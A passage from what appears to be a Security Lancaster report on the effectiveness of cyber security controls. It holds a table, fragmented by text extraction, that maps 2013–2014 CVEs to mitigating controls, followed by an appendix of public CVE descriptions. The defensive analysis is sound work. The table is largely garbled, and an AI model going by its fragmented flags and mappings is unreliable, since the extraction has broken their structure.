igat
edM
itig
ated
-P
atch
Man
agem
ent
An
ti-M
alw
are
CV
E-2
01
4-4
61
7y
yn
nn
No
tM
itig
ated
Mit
igat
ed-
Fir
ewal
lP
atch
Man
agem
ent
CV
E-2
01
4-4
63
1n
nn
nn
No
tM
itig
ated
Par
tial
lyM
itig
ated
-P
atch
Man
agem
ent
Sec
ure
Co
nfi
gu
rati
on
CV
E-2
01
4-6
04
0n
nn
nn
No
tM
itig
ated
Par
tial
lyM
itig
ated
-P
atch
Man
agem
ent
CV
E-2
01
4-6
10
5n
nn
nn
No
tM
itig
ated
Mit
igat
ed-
Fir
ewal
lP
atch
Man
agem
ent
CV
E-2
01
4-6
13
6n
nn
nn
No
tM
itig
ated
Mit
igat
ed-
Sec
ure
Co
nfi
gu
rati
on
P
atch
Man
agem
ent
CV
E-2
01
4-6
36
3y
ny
yn
No
tM
itig
ated
Mit
igat
ed-
Web
site
Bla
cklis
tin
g
Sec
ure
Co
nfi
gu
rati
on
(Sec
ure
Bro
wse
r)
Pat
chM
anag
emen
tC
VE
-20
14
-63
69
yn
yy
No
tM
itig
ated
Mit
igat
ed-
Web
site
Bla
cklis
tin
g
Sec
ure
Co
nfi
gu
rati
on
(Sec
ure
Bro
wse
r)
Pat
chM
anag
emen
tC
VE
-20
14
-63
78
nn
nn
nn
No
tM
itig
ated
Mit
igat
ed-
Fir
ewal
lP
atch
Man
agem
ent
CV
E-2
01
4-6
48
7n
ny
nn
No
tM
itig
ated
Par
tial
lyM
itig
ated
-P
atch
Man
agem
ent
CV
E-2
01
4-7
25
0n
yy
nn
No
tM
itig
ated
Mit
igat
ed-
Fir
ewal
lP
atch
Man
agem
ent
CV
E-2
01
4-7
92
7y
yy
yn
No
tM
itig
ated
Mit
igat
ed-
Fir
ewal
lS
ecu
reC
on
fig
ura
tio
n(A
cces
sC
on
tro
l)
Pat
chM
anag
emen
tC
VE
-20
14
-79
45
yy
yy
nN
ot
Mit
igat
edP
arti
ally
Mit
igat
ed-
Pat
chM
anag
emen
tC
VE
-20
14
-84
47
yy
yy
nN
ot
Mit
igat
edP
arti
ally
Mit
igat
ed-
An
ti-M
alw
are
Pat
chM
anag
emen
tC
VE
-20
14
-86
38
yy
yy
yN
ot
Mit
igat
edM
itig
ated
-W
ebsi
teB
lack
listi
ng
S
ecu
reC
on
fig
ura
tio
n(S
ecu
reB
row
ser)
P
atch
Man
agem
ent
CV
E-2
01
4-8
83
5y
yy
yy
No
tM
itig
ated
Par
tial
lyM
itig
ated
-P
atch
Man
agem
ent
CV
E-2
01
4-9
15
9y
yy
yy
No
tM
itig
ated
Par
tial
lyM
itig
ated
-A
nti
-Mal
war
eP
atch
Man
agem
ent
[Tim
eD
elay
]C
VE
-20
14
-91
63
yy
yy
yN
ot
Mit
igat
edP
arti
ally
Mit
igat
ed-
An
ti-M
alw
are
Pat
chM
anag
emen
t[T
ime
Del
ay]
CV
E-2
01
4-9
35
0y
yy
yn
No
tM
itig
ated
Mit
igat
ed-
Fir
ewal
lA
nti
-Do
sF
irm
war
eU
pd
ates
CV
E-2
01
4-9
35
7n
nn
nn
No
tM
itig
ated
Par
tial
lyM
itig
ated
-P
atch
Man
agem
ent
An
ti-M
alw
are
Sec
ure
Co
nfi
gu
rati
on
CYBER SECURITY CONTROLS EFFECTIVENESSmdash Security Lancaster Page 18 of 28
CVE DetailsCVE-2013-0008
rdquowin32ksys in the kernel-mode driversin Microsoft Windows Vista SP2 x000DWindows Server 2008 SP2 R2 and R2 SP1Windows 7 Gold and SP1 x000D Windows8 Windows Server 2012 and Windows RTdoes not properly x000D handle windowbroadcast messages which allows localusers to gain x000D privileges via acrafted application aka rdquordquoWin32k ImproperMessage x000D Handling Vulnerabilityrdquordquordquo
CVE-2013-0022rdquoUse-after-free vulnerability in MicrosoftInternet Explorer 9 allows x000D remoteattackers to execute arbitrary code viaa crafted web site that x000D triggersaccess to a deleted object aka rdquordquoInternetExplorer x000D LsGetTrailInfo Use AfterFree Vulnerabilityrdquordquordquo
CVE-2013-0084rdquoDirectory traversal vulnerability inMicrosoft SharePoint Server 2010 x000DSP1 and SharePoint Foundation 2010 SP1allows remote attackers to x000D bypassintended read restrictions for contentand hijack user x000D accounts via acrafted URL aka rdquordquoSharePoint DirectoryTraversal x000D Vulnerabilityrdquordquordquo
CVE-2013-0140SQL injection vulnerability in the Agent-Handler component in McAfee x000DePolicy Orchestrator (ePO) before 457and 46x before 466 allows x000Dremote attackers to execute arbitrary SQLcommands via a crafted x000D requestover the Agent-Server communicationchannel
CVE-2013-0149The OSPF implementation in Cisco IOS120 through 124 and 150 x000D through153 IOS-XE 2x through 39xS ASA andPIX 7x through 91 x000D FWSMNX-OS and StarOS before 14050488does not properly validate x000D LinkState Advertisement (LSA) type 1 packetsbefore performing x000D operations onthe LSA database which allows remoteattackers to cause x000D a denial ofservice (routing disruption) or obtainsensitive packet x000D information viaa (1) unicast or (2) multicast packetaka Bug IDs x000D CSCug34485CSCug34469 CSCug39762 CSCug63304and CSCug39795
CVE-2013-0172Samba 40x before 401 in certainActive Directory x000D domain-controllerconfigurations does not properly interpretAccess x000D Control Entries that arebased on an objectClass which allowsremote x000D authenticated users tobypass intended restrictions on modifyingLDAP x000D directory objects byleveraging (1) objectClass access by auser (2) x000D objectClass access by agroup or (3) write access to an attribute
CVE-2013-0174The external node classifier (ENC) APIin Foreman before 11 allows x000Dremote attackers to obtain the hashed rootpassword via an API x000D request
CVE-2013-0199The default LDAP ACIs in FreeIPA30 before 312 do not restrict x000Daccess to the (1) ipaNTTrustAuthIncomingand (2) x000D ipaNTTrustAuthOutgoingattributes which allow remote attackersto x000D obtain the Cross-Realm KerberosTrust key via unspecified vectors
CVE-2013-0253The default configuration of Apache Maven304 when using Maven x000D Wagon21 disables SSL certificate checks whichallows remote x000D attackers to spoofservers via a man-in-the-middle (MITM)attack
CVE-2013-0270OpenStack Keystone Grizzly before 20131Folsom and possibly earlier x000D allowsremote attackers to cause a denial of service(CPU and memory x000D consumption)via a large HTTP request as demonstratedby a long x000D tenant name whenrequesting a token
CVE-2013-0481The console in IBM Sterling B2B Integrator51 and 52 and Sterling File Gateway 21and 22 allows remote attackers to readstack traces by triggering (1) an error or(2) an exception
CVE-2013-0598Cross-site request forgery (CSRF)vulnerability in the Web Client in x000DIBM Rational ClearQuest 71 before71212 80 before 8008 and x000D801 before 8011 allows remote attackersto hijack the x000D authentication ofarbitrary users
CVE-2013-0619Adobe Reader and Acrobat 9x before 95310x before 1015 and x000D 11x before1101 allow attackers to execute arbitrarycode or cause x000D a denial of service(memory corruption) via unspecified vectorsa x000D different vulnerability than CVE-2012-1530 CVE-2013-0601 x000D CVE-2013-0605 CVE-2013-0616 CVE-2013-0620 and CVE-2013-0623
CVE-2013-0633Buffer overflow in Adobe Flash Playerbefore 10318351 and 11x before115502149 on Windows and Mac OSX before 10318351 and 11x before112202262 on Linux before 11111132on Android 2x and 3x and before11111537 on Android 4x allows remoteattackers to execute arbitrary code viacrafted SWF content as exploited in thewild in February 2013
CVE-2013-0649Use-after-free vulnerability in AdobeFlash Player before 10318363 and 11xbefore 116602168 on Windows before10318361 and 11x before 116602167on Mac OS X before 10318361 and11x before 112202270 on Linux before11111143 on Android 2x and 3x andbefore 11111547 on Android 4x AdobeAIR before 360597 and Adobe AIR SDKbefore 360599 allows attackers to executearbitrary code via unspecified vectors adifferent vulnerability than CVE-2013-0644
and CVE-2013-1374
CVE-2013-0746Mozilla Firefox before 180 Firefox ESR10x before 10012 and 17x x000Dbefore 1702 Thunderbird before 1702Thunderbird ESR 10x before x000D10012 and 17x before 1702 andSeaMonkey before 215 do not x000Dproperly implement quickstubs that usethe jsval data type for their x000D returnvalues which allows remote attackers toexecute arbitrary code x000D or cause adenial of service (compartment mismatchand application x000D crash) via craftedJavaScript code that is not properly handledduring x000D garbage collection
CVE-2013-0753Use-after-free vulnerability in theserializeToStream implementation x000Din the XMLSerializer component in MozillaFirefox before 180 Firefox x000D ESR10x before 10012 and 17x before1702 Thunderbird before x000D 1702Thunderbird ESR 10x before 10012 and17x before 1702 x000D and SeaMonkeybefore 215 allows remote attackers toexecute arbitrary x000D code via craftedweb content
CVE-2013-0787Use-after-free vulnerability in thensEditorIsPreformatted function x000Din editorlibeditorbasensEditorcppin Mozilla Firefox before x000D1902 Firefox ESR 17x before 1704Thunderbird before 1704 x000DThunderbird ESR 17x before 1704 andSeaMonkey before 2161 allows x000Dremote attackers to execute arbitrarycode via vectors involving an x000DexecCommand call
CVE-2013-0909The XSS Auditor in Google Chrome before2501364152 allows remote attackers toobtain sensitive HTTP Referer informationvia unspecified vectors
CVE-2013-1035The iTunes ActiveX control in Apple iTunesbefore 111 allows remote x000D attackersto execute arbitrary code or cause a denialof service x000D (memory corruption) viaa crafted web site
CVE-2013-1102The Wireless Intrusion Prevention System(wIPS) component on Cisco x000DWireless LAN Controller (WLC) deviceswith software 70 before x000D 70235071 and 72 before 721100 and 73before 731010 x000D allows remoteattackers to cause a denial of service(device reload) x000D via crafted IPpackets aka Bug ID CSCtx80743
CVE-2013-1140The XML parser in Cisco SecurityMonitoring Analysis and Response x000DSystem (MARS) allows remote attackers toread arbitrary files via an x000D externalentity declaration in conjunction with anentity reference x000D related to an XMLExternal Entity (XXE) issue aka Bug IDCSCue55093
CYBER SECURITY CONTROLS EFFECTIVENESSmdash Security Lancaster Page 19 of 28
CVE-2013-1144Memory leak in the IKEv1 implementationin Cisco IOS 151 allows x000D remoteattackers to cause a denial of service(memory consumption) via x000Dunspecified (1) IPv4 or (2) IPv6 IKEpackets aka Bug ID CSCth81055
CVE-2013-1153Cross-site request forgery (CSRF)vulnerability in the web interface x000Din Cisco Prime Infrastructure allowsremote attackers to hijack the x000Dauthentication of arbitrary users aka BugID CSCue84676
CVE-2013-1181Cisco NX-OS on Nexus 5500 devices4x and 5x before 50(3)N2(2) x000DNexus 3000 devices 5x before 50(3)U3(2)and Unified Computing x000D System(UCS) 6200 devices before 20(1w) allowsremote attackers to x000D cause a denialof service (device reload) by sending ajumbo packet to x000D the managementinterface aka Bug IDs CSCtx17544CSCts10593 and x000D CSCtx95389
CVE-2013-1303rdquoUse-after-free vulnerability in MicrosoftInternet Explorer 6 through x000D 10allows remote attackers to execute arbitrarycode via a crafted web x000D site thattriggers access to a deleted object akardquordquoInternet Explorer x000D Use After FreeVulnerabilityrdquordquo a different vulnerabilitythan x000D CVE-2013-1304 and CVE-2013-1338rdquo
CVE-2013-1384Adobe Shockwave Player before 1202122allows attackers to execute arbitrary codeor cause a denial of service (memorycorruption) via unspecified vectors adifferent vulnerability than CVE-2013-1386
CVE-2013-1388Unspecified vulnerability in AdobeColdFusion 90 before Update 10 x000D901 before Update 9 902 before Update4 and 10 before Update 9 x000D allowsattackers to obtain administrator-consoleaccess via unknown x000D vectors
CVE-2013-1450Microsoft Internet Explorer 8 and 9 whenthe Proxy Settings x000D configurationhas the same Proxy address and Portvalues in the HTTP x000D and Securerows does not properly reuse TCPsessions to the proxy x000D server whichallows remote attackers to obtain sensitiveinformation x000D intended for a specifichost via a crafted HTML document thattriggers x000D many HTTPS requests andthen triggers an HTTP request to thathost as x000D demonstrated by reading aCookie header aka MSRC 12096gd
CVE-2013-1472Unspecified vulnerability in the JavaFXcomponent in Oracle Java SE x000DJavaFX 224 and earlier allows remoteattackers to affect x000D confidentialityintegrity and availability via unknownvectors a x000D different vulnerabilitythan other CVEs listed in the February2013 x000D CPU
CVE-2013-1553Unspecified vulnerability in the OracleWeb Services Manager component x000Din Oracle Fusion Middleware 111160allows remote attackers to x000D affect
confidentiality and integrity via unknownvectors related to x000D Web ServicesSecurity
CVE-2013-1620The TLS implementation in MozillaNetwork Security Services (NSS)does x000D not properly considertiming side-channel attacks on anoncompliant x000D MAC checkoperation during the processing ofmalformed CBC padding x000D whichallows remote attackers to conductdistinguishing attacks and x000D plaintext-recovery attacks via statistical analysis oftiming data for x000D crafted packets arelated issue to CVE-2013-0169
CVE-2013-1627Absolute path traversal vulnerability inNTWebServerexe in Indusoft x000DStudio 70 and earlier and AdvantechStudio 70 and earlier allows x000D remoteattackers to read arbitrary files via a fullpathname in an x000D argument to thesub 401A90 CreateFileW function
CVE-2013-1638Opera before 1213 allows remote attackersto execute arbitrary code x000D via craftedclipPaths in an SVG document
CVE-2013-1669Multiple unspecified vulnerabilities in thebrowser engine in Mozilla x000D Firefoxbefore 210 allow remote attackers tocause a denial of x000D service (memorycorruption and application crash) or possiblyexecute x000D arbitrary code via unknownvectors
CVE-2013-1676The SelectionIteratorGetNextSegmentfunction in Mozilla Firefox before210 Firefox ESR 17x before 1706Thunderbird before 1706 andThunderbird ESR 17x before 1706 allowsremote attackers to execute arbitrary codeor cause a denial of service (out-of-boundsread) via unspecified vectors
CVE-2013-1700The Mozilla Maintenance Service in MozillaFirefox before 220 on x000D Windowsdoes not properly handle inability to launchthe Mozilla x000D Updater executablefile which allows local users to gainprivileges x000D via vectors involvingplacement of a Trojan horse executable fileat x000D an arbitrary location
CVE-2013-1734Cross-site request forgery (CSRF)vulnerability in attachmentcgi in x000DBugzilla 2x 3x and 40x before 401141x and 42x before x000D 427and 43x and 44x before 441 allowsremote attackers to x000D hijack theauthentication of arbitrary users for requeststhat commit x000D an attachment changevia an update action
CVE-2013-1777The JMX Remoting functionality in ApacheGeronimo 3x before 301 as x000D usedin IBM WebSphere Application Server(WAS) Community Edition x000D 3003and other products does not properlyimplement the RMI x000D classloaderwhich allows remote attackers to executearbitrary code x000D by using the JMXconnector to send a crafted serializedobject
CVE-2013-2319FileMaker Pro before 12 and Pro Advancedbefore 12 does not verify x000D X509certificates from SSL servers whichallows man-in-the-middle x000D attackersto spoof servers and obtain sensitiveinformation via a x000D crafted certificate
CVE-2013-2340Unspecified vulnerability on the HPProCurve JCA JCBJDA JDB JEAJFA JFB JFCJGA 658250-B21 and 658247-B21HP 3COM routers and switches and HPH3C routers and switches allows remoteattackers to execute arbitrary code orobtain sensitive information via unknownvectors
CVE-2013-2350Unspecified vulnerability in HP StorageData Protector 62X allows x000D remoteattackers to execute arbitrary code or causea denial of x000D service via unknownvectors aka ZDI-CAN-1897
CVE-2013-2492Stack-based buffer overflow in Firebird213 through 215 before x000D 18514and 251 through 253 before 26623 onWindows allows remote x000D attackersto execute arbitrary code via a craftedpacket to TCP port x000D 3050 relatedto a missing size check during extractionof a group x000D number from CNCTinformation
CVE-2013-2507Multiple cross-site scripting (XSS)vulnerabilities in the Brother MFC-9970CDW printer with firmware G (103)allow remote attackers to inject arbitraryweb script or HTML via the (1) id parameterto adminlog to nethtml or (2) kindparameter to faxcopy settingshtml adifferent vulnerability than CVE-2013-2670and CVE-2013-2671
CVE-2013-2736Adobe Reader and Acrobat 9x before 95510x before 1017 and x000D 11x before11003 allow attackers to execute arbitrarycode or cause x000D a denial of service(memory corruption) via unspecified vectorsa x000D different vulnerability than CVE-2013-2718 CVE-2013-2719 x000D CVE-2013-2720 CVE-2013-2721 CVE-2013-2722 CVE-2013-2723 x000D CVE-2013-2725 CVE-2013-2726 CVE-2013-2731CVE-2013-2732 x000D CVE-2013-2734CVE-2013-2735 CVE-2013-3337 CVE-2013-3338 x000D CVE-2013-3339 CVE-2013-3340 and CVE-2013-3341
CVE-2013-2780Siemens SIMATIC S7-1200 PLCs 2x and3x allow remote attackers to x000D causea denial of service (defect-mode transitionand control outage) x000D via craftedpackets to UDP port 161 (aka the SNMPport)
CVE-2013-2803ProSoft RadioLinx ControlScape before600040 uses a deficient PRNG x000Dalgorithm and seeding strategy forpassphrases which makes it easier x000Dfor remote attackers to obtain access via abrute-force attack
CVE-2013-2824Schneider Electric StruxureWare SCADAExpert Vijeo Citect 740 Vijeo x000D
CYBER SECURITY CONTROLS EFFECTIVENESSmdash Security Lancaster Page 20 of 28
Citect 720 through 730SP1 CitectSCADA720 through 730SP1 x000DStruxureWare PowerSCADA Expert 730through 730SR1 and PowerLogic x000DSCADA 720 through 720SR1 do notproperly handle exceptions which x000Dallows remote attackers to cause a denialof service via a crafted x000D packet
CVE-2013-2826WellinTech KingSCADA before312 KingAlarmampEvent before 31and x000D KingGraphic before 312perform authentication on the x000DKAEClientManager console rather than onthe server which allows x000D remoteattackers to bypass intended accessrestrictions and discover x000D credentialsvia a crafted packet to TCP port 8130
CVE-2013-2920The DoResolveRelativeHost functionin urlurl canon relativecc in x000DGoogle Chrome before 300159966 allowsremote attackers to cause a x000Ddenial of service (out-of-bounds read)via a relative URL containing a x000Dhostname as demonstrated by a protocol-relative URL beginning with a x000Dwwwgooglecom substring
CVE-2013-3064Open redirect vulnerability inuidynamicunsecuredhtml inLinksys x000D EA6500 with firmware1128147876 allows remote attackers toredirect x000D users to arbitrary web sitesand conduct phishing attacks via a URLin x000D the target parameter
CVE-2013-3116rdquoMicrosoft Internet Explorer 7 through 9allows remote attackers to execute arbitrarycode or cause a denial of service (memorycorruption) via a crafted web site akardquordquoInternet Explorer Memory CorruptionVulnerabilityrdquordquordquo
CVE-2013-3137rdquoMicrosoft FrontPage 2003 SP3 does notproperly parse DTDs which allows remoteattackers to obtain sensitive information viacrafted XML data in a FrontPage documentaka rdquordquoXML Disclosure Vulnerabilityrdquordquordquo
CVE-2013-3194rdquoMicrosoft Internet Explorer 9 allows remoteattackers to execute x000D arbitrary codeor cause a denial of service (memorycorruption) via a x000D crafted website aka rdquordquoInternet Explorer MemoryCorruption x000D Vulnerabilityrdquordquordquo
CVE-2013-3199rdquoMicrosoft Internet Explorer 6 through10 allows remote attackers to x000Dexecute arbitrary code or cause a denialof service (memory x000D corruption)via a crafted web site aka rdquordquoInternetExplorer Memory x000D CorruptionVulnerabilityrdquordquordquo
CVE-2013-3201rdquoMicrosoft Internet Explorer 9 and 10allows remote attackers to x000D executearbitrary code or cause a denial ofservice (memory x000D corruption) via acrafted web site aka rdquordquoInternet ExplorerMemory x000D Corruption Vulnerabilityrdquordquoa different vulnerability than x000D CVE-2013-3203 CVE-2013-3206 CVE-2013-3207 and CVE-2013-3209rdquo
CVE-2013-3206
rdquoMicrosoft Internet Explorer 9 and 10allows remote attackers to x000D executearbitrary code or cause a denial ofservice (memory x000D corruption) via acrafted web site aka rdquordquoInternet ExplorerMemory x000D Corruption Vulnerabilityrdquordquoa different vulnerability than x000D CVE-2013-3201 CVE-2013-3203 CVE-2013-3207 and CVE-2013-3209rdquo
CVE-2013-3280EMC RSA Authentication Agent 71xbefore 712 for Web for Internet x000DInformation Services has a fail-open designwhich allows remote x000D attackers tobypass intended access restrictions viavectors that x000D trigger an agent crash
CVE-2013-3387Cisco Prime Central for HostedCollaboration Solution (HCS)Assurance x000D 86 and 9x before 92(1)allows remote attackers to cause a denialof x000D service (disk consumption) via aflood of TCP packets to port 5400 x000Dleading to large error-log files aka Bug IDCSCua42724
CVE-2013-3417The administrative web interface in CiscoVideo Surveillance Operations Managerdoes not properly perform authenticationwhich allows remote attackers to watchvideo feeds via a crafted URL aka BugID CSCtg72262
CVE-2013-3632The Cron service in rpcphp inOpenMediaVault allows remote x000Dauthenticated users to execute cron jobs asarbitrary users and x000D execute arbitrarycommands via the username parameter
CVE-2013-3656: Cybozu Office 9.1.0 and earlier does not properly manage sessions, which allows remote attackers to bypass authentication by leveraging knowledge of a login URL.
CVE-2013-3856: Microsoft Word 2003 SP3 and Word Viewer allow remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted Office document, aka "Word Memory Corruption Vulnerability."
CVE-2013-3860: Microsoft .NET Framework 2.0 SP2, 3.5, 3.5 SP1, 3.5.1, 4, and 4.5 does not properly parse a DTD during XML digital-signature validation, which allows remote attackers to cause a denial of service (application crash or hang) via a crafted signed XML document, aka "Entity Expansion Vulnerability."
CVE-2013-3893: Use-after-free vulnerability in the SetMouseCapture implementation in mshtml.dll in Microsoft Internet Explorer 6 through 11 allows remote attackers to execute arbitrary code via crafted JavaScript strings, as demonstrated by use of an ms-help: URL that triggers loading of hxds.dll.
CVE-2013-3897: Use-after-free vulnerability in the CDisplayPointer class in mshtml.dll in Microsoft Internet Explorer 6 through 11 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via crafted JavaScript code that uses the onpropertychange event handler, as exploited in the wild in September and October 2013, aka "Internet Explorer Memory Corruption Vulnerability."
CVE-2013-3900: The WinVerifyTrust function in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2 and R2 SP1, Windows 7 SP1, Windows 8, Windows 8.1, Windows Server 2012 Gold and R2, and Windows RT Gold and 8.1 does not properly validate PE file digests during Authenticode signature verification, which allows remote attackers to execute arbitrary code via a crafted PE file, aka "WinVerifyTrust Signature Validation Vulnerability."
CVE-2013-3905: Microsoft Outlook 2007 SP3, 2010 SP1 and SP2, 2013, and 2013 RT does not properly expand metadata contained in S/MIME certificates, which allows remote attackers to obtain sensitive network configuration and state information via a crafted certificate in an e-mail message, aka "S/MIME AIA Vulnerability."
CVE-2013-4223: The Gentoo Nullmailer package before 1.11-r2 uses world-readable permissions for /etc/nullmailer/remotes, which allows local users to obtain SMTP authentication credentials by reading the file.
CVE-2013-4436: The default configuration for salt-ssh in Salt (aka SaltStack) 0.17.0 does not validate the SSH host key of requests, which allows remote attackers to have unspecified impact via a man-in-the-middle (MITM) attack.
CVE-2013-4478: Sup before 0.13.2.1 and 0.14.x before 0.14.1.1 allows remote attackers to execute arbitrary commands via shell metacharacters in the filename of an email attachment.
CVE-2013-4529: Buffer overflow in hw/pci/pcie_aer.c in QEMU before 1.7.2 allows remote attackers to cause a denial of service and possibly execute arbitrary code via a large log_num value in a savevm image.
CVE-2013-4555: Cross-site request forgery (CSRF) vulnerability in ecrire/action/logout.php in SPIP before 2.1.24 allows remote attackers to hijack the authentication of arbitrary users for requests that logout the user via unspecified vectors.
CVE-2013-4776: NETGEAR ProSafe GS724Tv3 and GS716Tv2 with firmware 5.4.1.13 and earlier, GS748Tv4 5.4.1.14, and GS510TP 5.0.4.4 allows remote attackers to cause a denial of service (reboot or crash) via a crafted HTTP request to /filesystem.
CVE-2013-4782: The Supermicro BMC implementation allows remote attackers to bypass authentication and execute arbitrary IPMI commands by using cipher suite 0 (aka cipher zero) and an arbitrary password.
CVE-2013-5057: hxds.dll in Microsoft Office 2007 SP3 and 2010 SP1 and SP2 does not implement the ASLR protection mechanism, which makes it easier for remote attackers to execute arbitrary code via a crafted COM component on a web site that is visited with Internet Explorer, as exploited in the wild in December 2013, aka "HXDS ASLR Vulnerability."
CVE-2013-5369: IBM SPSS Analytical Decision Management 6.1 before IF1, 6.2 before IF1, and 7.0 before FP1 IF6 might allow remote attackers to execute arbitrary code by deploying and accessing a service.
CVE-2013-5428: IBM WebSphere DataPower XC10 appliances 2.5.0 do not require authentication for all administrative actions, which allows remote attackers to cause a denial of service via unspecified vectors.
CVE-2013-5431: Open redirect vulnerability in IBM Tivoli Federated Identity Manager (TFIM) 6.1.1 before IF 15, 6.2.0 before IF 14, 6.2.1, and 6.2.2 before IF 8, and Tivoli Federated Identity Manager Business Gateway (TFIMBG) 6.1.1 before IF 15, 6.2.0 before IF 14, 6.2.1, and 6.2.2 before IF 8 allows remote attackers to redirect users to arbitrary web sites and conduct phishing attacks via unspecified vectors.
CVE-2013-5494: Cross-site request forgery (CSRF) vulnerability in the web framework in Cisco Unified MeetingPlace Solution, as used in Unified MeetingPlace Web Conferencing and Unified MeetingPlace, allows remote attackers to hijack the authentication of arbitrary users, aka Bug IDs CSCui45209 and CSCui44674.
CVE-2013-5507: The IPsec implementation in Cisco Adaptive Security Appliance (ASA) Software 9.1 before 9.1(1.7), when an IPsec VPN tunnel is enabled, allows remote attackers to cause a denial of service (device reload) via a (1) ICMP or (2) ICMPv6 packet that is improperly handled during decryption, aka Bug ID CSCue18975.
CVE-2013-5536: Cisco Secure Access Control System (ACS) does not properly implement an incoming-packet firewall rule, which allows remote attackers to cause a denial of service (process crash) via a flood of crafted packets, aka Bug ID CSCui51521.
CVE-2013-5559: Buffer overflow in the Active Template Library (ATL) framework in the VPNAPI COM module in Cisco AnyConnect Secure Mobility Client 2.x allows user-assisted remote attackers to execute arbitrary code via a crafted HTML document, aka Bug ID CSCuj58139.
CVE-2013-5561: The Safe Search enforcement feature in Cisco Adaptive Security Appliance (ASA) CX Context-Aware Security Software does not properly perform filtering, which allows remote attackers to bypass intended policy restrictions via unspecified vectors, aka Bug ID CSCui94622.
CVE-2013-5751: Directory traversal vulnerability in SAP NetWeaver 7.x allows remote attackers to read arbitrary files via unspecified vectors.
CVE-2013-5757: Absolute path traversal vulnerability in Yealink VoIP Phone SIP-T38G allows remote authenticated users to read arbitrary files via a full pathname in the dumpConfigFile function in the command parameter to cgi-bin/cgiServer.exx.
CVE-2013-5828: Unspecified vulnerability in the Enterprise Manager Base Platform component in Oracle Enterprise Manager Grid Control EM Base Platform 10.2.0.5 and 11.1.0.1, EM DB Control 11.1.0.7, 11.2.0.2, and 11.2.0.3, and EM Plugin for DB 12.1.0.2 and 12.1.0.3 allows remote attackers to affect integrity via unknown vectors related to Storage Management.
CVE-2013-6167: Mozilla Firefox through 27 sends HTTP Cookie headers without first validating that they have the required character-set restrictions, which allows remote attackers to conduct the equivalent of a persistent Logout CSRF attack via a crafted parameter that forces a web application to set a malformed cookie within an HTTP response.
CVE-2013-6188: Cross-site request forgery (CSRF) vulnerability in HP System Management Homepage (SMH) 7.1 through 7.2.2 allows remote attackers to hijack the authentication of unspecified victims via unknown vectors.
CVE-2013-6284: Unspecified vulnerability in the Statutory Reporting for Insurance (FS SR) component in the Financial Services module for SAP ERP Central Component (ECC) allows attackers to execute arbitrary code via unspecified vectors, related to a "code injection vulnerability."
CVE-2013-6396: The OpenStack Python client library for Swift (python-swiftclient) 1.0 through 1.9.0 does not verify X.509 certificates from SSL servers, which allows man-in-the-middle attackers to spoof servers and obtain sensitive information via a crafted certificate.
CVE-2013-6475: Multiple integer overflows in (1) OPVPOutputDev.cxx and (2) oprs/OPVPSplash.cxx in the pdftoopvp filter in CUPS and cups-filters before 1.0.47 allow remote attackers to execute arbitrary code via a crafted PDF file, which triggers a heap-based buffer overflow.
CVE-2013-6660: The drag-and-drop implementation in Google Chrome before 33.0.1750.117 does not properly restrict the information in WebDropData data structures, which allows remote attackers to discover full pathnames via a crafted web site.
CVE-2013-6699: The Control and Provisioning of Wireless Access Points (CAPWAP) protocol implementation on Cisco Wireless LAN Controller (WLC) devices allows remote attackers to cause a denial of service via a crafted CAPWAP packet that triggers a buffer over-read, aka Bug ID CSCuh81880.
CVE-2013-6702: The management implementation on Cisco ONS 15454 controller cards with software 9.8 and earlier allows remote attackers to cause a denial of service (card reset) via crafted packets, aka Bug ID CSCtz50902.
CVE-2013-6979: The VTY authentication implementation in Cisco IOS XE 03.02.xx.SE and 03.03.xx.SE incorrectly relies on the Linux-IOS internal-network configuration, which allows remote attackers to bypass authentication by leveraging access to a 192.168.x.2 source IP address, aka Bug ID CSCuj90227.
CVE-2013-6994: OpenText Exceed OnDemand (EoD) 8 transmits the session ID in cleartext, which allows remote attackers to perform session fixation attacks by sniffing the network.
CVE-2013-7004: D-Link DSR-150 with firmware before 1.08B44, DSR-150N with firmware before 1.05B64, DSR-250 and DSR-250N with firmware before 1.08B44, and DSR-500, DSR-500N, DSR-1000, and DSR-1000N with firmware before 1.08B77 have a hardcoded account of username gkJ9232xXyruTRmY, which makes it easier for remote attackers to obtain access by leveraging knowledge of the username.
CVE-2013-7043: Multiple cross-site request forgery (CSRF) vulnerabilities on Cisco Scientific Atlanta DPR2320R2 routers with software 2.0.2r1262-090417 allow remote attackers to hijack the authentication of administrators for requests that (1) change a password via the Password parameter to goform/RgSecurity, (2) reboot the device via the Restart parameter to goform/restart, (3) modify Wi-Fi settings, as demonstrated by the WpaPreSharedKey parameter to goform/wlanSecurity, or (4) modify parental controls via the ParentalPassword parameter to goform/RgParentalBasic.
CVE-2013-7389: Multiple cross-site scripting (XSS) vulnerabilities in D-Link DIR-645 Router (Rev. A1) with firmware before 1.04B11 allow remote attackers to inject arbitrary web script or HTML via the (1) deviceid parameter to parentalcontrols/bind.php, (2) RESULT parameter to info.php, or (3) receiver parameter to bsc_sms_send.php.
CVE-2014-0001: Buffer overflow in client/mysql.cc in Oracle MySQL and MariaDB before 5.5.35 allows remote database servers to cause a denial of service (crash) and possibly execute arbitrary code via a long server version string.
CVE-2014-0035: The SymmetricBinding in Apache CXF before 2.6.13 and 2.7.x before 2.7.10, when EncryptBeforeSigning is enabled and the UsernameToken policy is set to an EncryptedSupportingToken, transmits the UsernameToken in cleartext, which allows remote attackers to obtain sensitive information by sniffing the network.
CVE-2014-0160: The (1) TLS and (2) DTLS implementations in OpenSSL 1.0.1 before 1.0.1g do not properly handle Heartbeat Extension packets, which allows remote attackers to obtain sensitive information from process memory via crafted packets that trigger a buffer over-read, as demonstrated by reading private keys, related to d1_both.c and t1_lib.c, aka the Heartbleed bug.
CVE-2014-0207: The cdf_read_short_sector function in cdf.c in file before 5.19, as used in the Fileinfo component in PHP before 5.4.30 and 5.5.x before 5.5.14, allows remote attackers to cause a denial of service (assertion failure and application exit) via a crafted CDF file.
CVE-2014-0259: Microsoft Word 2007 SP3 and Office Compatibility Pack SP3 allow remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted Office document, aka "Word Memory Corruption Vulnerability."
